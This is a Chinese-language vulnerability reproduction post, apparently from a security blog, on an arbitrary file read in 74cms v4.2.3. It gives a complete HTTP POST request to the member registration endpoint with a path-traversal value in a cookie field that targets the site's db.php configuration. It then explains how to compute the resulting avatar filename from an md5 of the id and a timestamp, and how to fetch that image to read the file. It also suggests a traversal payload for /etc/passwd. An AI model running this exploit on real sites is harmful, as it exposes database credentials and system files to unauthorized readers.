014-74cms v4.2.3任意文件读取

# 74cms v4.2.3任意文件读取

## 一、漏洞简介

## 二、漏洞影响

74cms v4.2.3

## 三、复现过程

先尝试读取 db.php,向服务器post如下数据

“`bash
POST /index.php?m=&c=members&a=register HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: members_bind_info[temp_avatar]=../../../../Application/Common/Conf/db.php; members_bind_info[type]=qq; members_uc_info[password]=xcxmiku; members_uc_info[uid]=123456; members_uc_info[username]=xcxmiku
Content-Type: application/x-www-form-urlencoded

ajax=1&reg_type=2&utype=2&org=bind&ucenter=bind

“`

会返回如下数据

![1.png](/static/lingzu/images/2020_05-22/4cb7e34dec67474fa98b8136abc8f5fd.png)

在/data/upload/avatar/年月/日文件夹下 会生成一张图片

![2.png](/static/lingzu/images/2020_05-22/66b890b0034c4628bafb072fad50e947.png)

这张图片的名称由id和时间戳的md5值构成,我们可以将Burp Suite上返回的时间转换为时间戳

![3.png](/static/lingzu/images/2020_05-22/930140fbfa7848a5933bf4d0cfe90585.png)

不过这个时间可能会有误差,如果不行就把时间+-10

我post的id为654321,获取的时间戳为1571659588,将他们连在一起进行md5加密

![4.png](/static/lingzu/images/2020_05-22/285ab911013f44ee8d7e1b0499a7e696.png)

成功获取图片名,然后访问

“`bash
https://www.baidu.com/data/upload/avatar/1910/21/9aaa3653bf6ec9491bc002b52521962c.jpg

“`

保存该图片用文本打开就是 db.php 的内容。

###### PS:

使用post提交,参数如下

![5.png](/static/lingzu/images/2020_05-22/181f024db95a4aa28ae64fb89960bb8b.png)

在Header可获取到时间戳

![6.png](/static/lingzu/images/2020_05-22/ce5f646d6fd5478398d3107233e6cd36.png)

### 可能会遇到的问题

###### post数据返回unicode编码

因为名称,密码,ID等内容格式不对或重复会出现这种情况,将unicode编码进行解码,按提示修改即可。

###### 读取其他文件

“`
../../../../Application/Common/Conf/db.php
“`

是读取db.php,如果想读取根目录可以构造

“`
../../../../../../../../etc/passwd
“`

###### 时间戳问题

服务器返回的时间,服务器返回的是GMT格林威治标准时间,没有加上时区,只记录分秒即可

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容